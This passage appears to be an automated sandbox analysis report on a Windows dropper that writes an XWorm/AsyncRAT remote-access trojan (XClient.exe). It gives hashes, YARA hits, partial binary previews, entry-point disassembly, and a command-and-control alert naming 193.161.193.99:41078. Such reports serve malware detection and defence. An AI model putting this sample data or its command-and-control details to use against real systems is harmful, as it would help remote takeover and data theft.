                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb06ef157, page size 8192, JustCreated, Windows version 0.0
                                                                                  Category:dropped
                                                                                  Size (bytes):262144
                                                                                  Entropy (8bit):0.14191673320223755
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:02gAhY+VxEyVjqaytqxUSYQHDmit8UPcim:rhY+VxEyVjqaytqxUSYQHDmit8UPcim
                                                                                  MD5:EE6950B79A4FF120BAD06B3ACBE938CC
                                                                                  SHA1:08B92BA14B426741AF8ED1EDF6B10D0D918F7DF4
                                                                                  SHA-256:B2E1C40CCD4F8527984BE100F9B3E4D361FFBFEDBB75D371B864564772ACD385
                                                                                  SHA-512:E68B867F0A3D76A970B4AB65FD632AE70F914B751767641FD06913C6780BC08294B92830B91C918A182592B1AA62ED3EEDE1419AD26785EC5D61C6C9AE95A615
                                                                                  Malicious:false
                                                                                  Preview:.n.W... .......@.........S5....}........................................................................................................................................................................................................... ...................................................................................................... ...................................................................................................................................................................................................................................................\.K.5....}!.....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):215
                                                                                  Entropy (8bit):4.842714017180681
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqdeFIKLROtRslUERrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOdeZlv2y9EGmNrDnb
                                                                                  MD5:679E182D5665B2C2C734273D313F4425
                                                                                  SHA1:A3EB802AD91F656E326B203D31DE512E9E457A1A
                                                                                  SHA-256:1F06BE15FFFA50F818A040059E2064E95BF526D0D5804FD8181B53B3FD6D8E85
                                                                                  SHA-512:B43F4E835B9CCA62C38F3413670A7F3A0C72CE381BD9E54C333A2FB21233C83CCE2E627A42A49197F5846FB8B6D03DF9A64696D6F5605E7F4057219BA5E4F738
                                                                                  Malicious:false
                                                                                  Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="31" monthOfLastLaunch="5" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml.~tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):215
                                                                                  Entropy (8bit):4.842714017180681
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqdeFIKLROtRslUERrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOdeZlv2y9EGmNrDnb
                                                                                  MD5:679E182D5665B2C2C734273D313F4425
                                                                                  SHA1:A3EB802AD91F656E326B203D31DE512E9E457A1A
                                                                                  SHA-256:1F06BE15FFFA50F818A040059E2064E95BF526D0D5804FD8181B53B3FD6D8E85
                                                                                  SHA-512:B43F4E835B9CCA62C38F3413670A7F3A0C72CE381BD9E54C333A2FB21233C83CCE2E627A42A49197F5846FB8B6D03DF9A64696D6F5605E7F4057219BA5E4F738
                                                                                  Malicious:false
                                                                                  Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="31" monthOfLastLaunch="5" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):2.660667103151342
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:DJadNmQkr1eAFDfSDA3bTbfTHf59gFBNrUH6PpQhG0m4EbPVmVfPSYeZbmGPXSQu:VadNmQKqDA3bTr3aPUNhoOSFoi9S
                                                                                  MD5:94CC539278AF9FC9FF84CFDFD4381490
                                                                                  SHA1:9B0989C7599B55D2A5426ED465C4C8B717421A96
                                                                                  SHA-256:25F4209CEF69688925FB90383E5948D13DC8073EF0218D145A545E051D9E22C7
                                                                                  SHA-512:3CEA958A905B54B9EB6B29AF37F016069959AFD1F30A76C0852E38C10126FE6F09BDC48B143BF0C02A19CF4659C02A3F226D3B58582F9EEB8E40A7C5BAD15DCD
                                                                                  Malicious:false
                                                                                  Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm./..k................................................................................................................................................................................................................................................................................................................................................L|q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):3.371886878163016
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:YJa5NmQkr1eAFDfSDA3bTbfTHf59gFBNrUH6PpQhG0m4EbPVmVfPSYeZbmGPXSQu:8a5NmQKqDA3bTr3aPUNhoOSFoi9S
                                                                                  MD5:2EFE324263D285C88F251E12BB29F2A6
                                                                                  SHA1:B76D52A381A0D06F530BECB06089C6C33D7B6D45
                                                                                  SHA-256:6AC1849AFE093F595818DCF6A64ECADADE271E44252337D361F5728A6A37253D
                                                                                  SHA-512:25E8DF3AD80DA9CA94FF0BB636ABF98743953FF62F3BF9B2E7A70965AC393DAE2C9BEB022D2F6F3056133A249FF8C29F7579CA0A615D8290368A7E804F5A8378
                                                                                  Malicious:false
                                                                                  Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm./..k................................................................................................................................................................................................................................................................................................................................................L|qHvLE............. ......_...'.w....._...... ..hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk ...I.k...................................h...............................Configuration...p...sk..x...x.......t.......H...X.............4.........?.......................

                                                                                  C:\Users\user\AppData\Local\Temp\Bruh - Sound Effect (HD) - Gaming Sound FX.mp3

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\test2.exe.bin.exe
                                                                                  File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 320 kbps, 48 kHz, JntStereo
                                                                                  Category:dropped
                                                                                  Size (bytes):81707
                                                                                  Entropy (8bit):4.126349148377333
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:/60rlQ+cKFV0G90CSSQ9sPw0JUn3Ju4iLXGIbtqy8BjT2UqwEvNf1vCvhYmTUFQ0:/7JQtKJQYwYUnZu4iLW+EjNgZCim5YdF
                                                                                  MD5:79953F860B5BEC1F7ED6AC173203BA28
                                                                                  SHA1:236BF7949BD8345BEF52C95E0298DF1A9AA5BCDE
                                                                                  SHA-256:318D3882B99BF80B35ADA45E27D79593468DB6563A1DEB4935B768620AF35D50
                                                                                  SHA-512:B1B2330FE0CA271489CD1367F95ACF129BEF13801BBB9A0A421916BF5B67017FD03F06C4C8B7EC0F3E3D94CD7D9912048DC2FD2C578E67D791888DC598D8FCB1
                                                                                  Malicious:false
                                                                                  Preview:ID3......aTPE1.......Gaming Sound FX.TIT2.......Bruh - Sound Effect (HD).TSSE.......Lavf60.3.100..............d.....i....... .......... ..4....LAME3.100UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUULAME3.100UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

                                                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                                  File Type:Generic INItialization configuration [WIN]
                                                                                  Category:dropped
                                                                                  Size (bytes):66
                                                                                  Entropy (8bit):3.9225895736416696
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:rRSF0KKM2XNsr42VjF0KKM2XX:EFmM2ur5FmM2n
                                                                                  MD5:3E8317227986355E07042038E6B37B00
                                                                                  SHA1:8260AE251A3C632F28B61AFDE65251934A6654BA
                                                                                  SHA-256:89B70297198948DAA067605A1520B670439385CEBB1176127FE55AE731B1E6DD
                                                                                  SHA-512:EC274C42553B7C29ED6AA814BC4A06B7EDA747D45AB283460AE9C3E839AE2C56DCF0CDBB936A46B58C510A240CA0171F941ABFBC3D59743880DDC28C9E7CD5E9
                                                                                  Malicious:false
                                                                                  Preview:....### Groove Music ###..[WIN]r[WIN]....### Groove Music ###..r

                                                                                  C:\Users\user\AppData\Local\Temp\XClient.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\test2.exe.bin.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):66560
                                                                                  Entropy (8bit):6.059738091369709
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Av0IoKmrPN5OoUFexjB2AbCJ4BPF+buERznntO9UAWX:Q0LKmrPV26E4BPF+buy7tO9UD
                                                                                  MD5:4D152B9AAAEC95BD696369CE3793BBF5
                                                                                  SHA1:63FA940184616380E268E4C377528826256823B8
                                                                                  SHA-256:672777833A6661125CDD6586664AAA62E31FC362B777E178FA45A285B989CD56
                                                                                  SHA-512:8F9F6D151896E2912CAB915034DC4EDF633006109DA2C5070A4A12DF1C0E2406594927048A0DF05CB73AC34263DC96C53B4266185D0551ADCD33959967716719
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Sekoia.io
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x[..L.......&.....................................................(....*.r...p*. S...*..(....*.r!..p*. .(8.*.s.........s.........s.........s.........*.rA..p*. ~{..*.ra..p*. .i.*.r...p*. =...*.r...p*. Q..*.r...p*. E/..*..((...*.r...p*.r...p*. |A..*"(....+.*&(....&+.*.+5sF... .... .'..oG...(,...~....-.(D...(6...~....oH...&.-.*.rw..p*. u..*.r...p*. ....*.r...p*. .T..*.r...p*. "Y..*.r...p*. ....*..............j..................sI..............*"(F...+.*:.t....(A...+.*

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cuwe1uc.vgs.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewnv5lid.gir.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rph1qqap.bsd.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxu5s3jv.k2i.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\test

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):66560
                                                                                  Entropy (8bit):6.059738091369709
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Av0IoKmrPN5OoUFexjB2AbCJ4BPF+buERznntO9UAWX:Q0LKmrPV26E4BPF+buy7tO9UD
                                                                                  MD5:4D152B9AAAEC95BD696369CE3793BBF5
                                                                                  SHA1:63FA940184616380E268E4C377528826256823B8
                                                                                  SHA-256:672777833A6661125CDD6586664AAA62E31FC362B777E178FA45A285B989CD56
                                                                                  SHA-512:8F9F6D151896E2912CAB915034DC4EDF633006109DA2C5070A4A12DF1C0E2406594927048A0DF05CB73AC34263DC96C53B4266185D0551ADCD33959967716719
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\test, Author: Joe Security
                                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\test, Author: Sekoia.io
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\test, Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x[..L.......&.....................................................(....*.r...p*. S...*..(....*.r!..p*. .(8.*.s.........s.........s.........s.........*.rA..p*. ~{..*.ra..p*. .i.*.r...p*. =...*.r...p*. Q..*.r...p*. E/..*..((...*.r...p*.r...p*. |A..*"(....+.*&(....&+.*.+5sF... .... .'..oG...(,...~....-.(D...(6...~....oH...&.-.*.rw..p*. u..*.r...p*. ....*.r...p*. .T..*.r...p*. "Y..*.r...p*. ....*..............j..................sI..............*"(F...+.*:.t....(A...+.*

                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Entropy (8bit):7.1977303294380475
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • VXD Driver (31/22) 0.00%
                                                                                  File name:test2.exe.bin.exe
                                                                                  File size:153'600 bytes
                                                                                  MD5:2aa459d8249147d19837b06c8640a950
                                                                                  SHA1:38d8e8405b5efa19120d93b67a95ca03d0da3696
                                                                                  SHA256:1a6ad2dbd06aa2cd83a7275e492b9c98388243f1dd10e96394933251480acad5
                                                                                  SHA512:4963332d4ce2c7041b8039f795ec58a629ebe4ce0cfd093c5f0803b1aa77e136fa72492a3a55d581715e36049c1b97bf8096f2b61b24e985f835685017093eb0
                                                                                  SSDEEP:1536:ncIxGxxwe8BSlZ4bGqGZI/DSbhXPQMFkUFA/paJU39zYZQXcZMq3p3/f/JnDleqF:nRGjNbRZILcXTFFCUKNz2WMMORD/kG
                                                                                  TLSH:BBE3D9230A16AC62FEF3C6320C634636FDB1F6B2CA5589764947408E6DF8716E58CF19
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................L...............p....@..................................m.....................................

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4014d1
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                  DLL Characteristics:
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:a9c887a4f18a3fede2cc29ceea138ed3

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000008h
                                                                                  nop
                                                                                  mov eax, 00000004h
                                                                                  push eax
                                                                                  mov eax, 00000000h
                                                                                  push eax
                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                  push eax
                                                                                  call 00007F05A0B74F5Dh
                                                                                  add esp, 0Ch
                                                                                  mov eax, 004014AFh
                                                                                  push eax
                                                                                  call 00007F05A0B74F97h
                                                                                  mov eax, 00000001h
                                                                                  push eax
                                                                                  call 00007F05A0B74F94h
                                                                                  add esp, 04h
                                                                                  mov eax, 00030000h
                                                                                  push eax
                                                                                  mov eax, 00010000h
                                                                                  push eax
                                                                                  call 00007F05A0B74F88h
                                                                                  add esp, 08h
                                                                                  mov eax, dword ptr [00426574h]
                                                                                  mov ecx, dword ptr [00426578h]
                                                                                  mov edx, dword ptr [0042657Ch]
                                                                                  mov dword ptr [ebp-08h], eax
                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                  push eax
                                                                                  mov eax, dword ptr [00427000h]
                                                                                  push eax
                                                                                  push edx
                                                                                  push ecx
                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                  push eax
                                                                                  call 00007F05A0B74F62h
                                                                                  add esp, 14h
                                                                                  mov eax, dword ptr [00426574h]
                                                                                  mov ecx, dword ptr [00426578h]
                                                                                  mov edx, dword ptr [0042657Ch]
                                                                                  mov dword ptr [ebp-08h], eax
                                                                                  mov eax, dword ptr [edx]
                                                                                  push eax
                                                                                  mov eax, dword ptr [ecx]
                                                                                  push eax
                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  push eax
                                                                                  call 00007F05A0B74D3Ch
                                                                                  add esp, 0Ch
                                                                                  push eax
                                                                                  call 00007F05A0B74F38h
                                                                                  add esp, 04h
                                                                                  leave
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000004h
                                                                                  nop
                                                                                  mov eax, dword ptr [00426574h]
                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                  mov dword ptr [eax], ecx
                                                                                  mov eax, dword ptr [00000000h]

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x265000x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x2f8.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x265500x58.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x6680x800c5de0bae10dd3692320ec100985aa899False0.40869140625data4.609985039863669IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x20000x247030x24800c44648cc56cdd1827b63d168e9363c50False0.550734428510274data7.191342161979317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .bss0x270000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x280000x2f80x4001a81e557b8e13cf15d3843868cde2d0bFalse0.353515625data4.275513236564972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_MANIFEST0x280580x29fXML 1.0 document, ASCII textEnglishUnited States0.47093889716840537

                                                                                  Imports

                                                                                  DLLImport
                                                                                  msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                                  shell32.dllShellExecuteA
                                                                                  kernel32.dllSetUnhandledExceptionFilter

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-03-16T13:10:49.951717+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449773193.161.193.9941078TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 16, 2025 13:06:58.481085062 CET49710443192.168.2.492.123.20.9
                                                                                  Mar 16, 2025 13:06:58.481132030 CET4434971092.123.20.9192.168.2.4
                                                                                  Mar 16, 2025 13:06:58.481199026 CET49710443192.168.2.492.123.20.9
                                                                                  Mar 16, 2025 13:06:58.506231070 CET49710443192.168.2.492.123.20.9
                                                                                  Mar 16, 2025 13:06:58.506258011 CET4434971092.123.20.9192.168.2.4
                                                                                  Mar 16, 2025 13:06:58.913202047 CET4971141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:06:58.917990923 CET4107849711193.161.193.99192.168.2.4
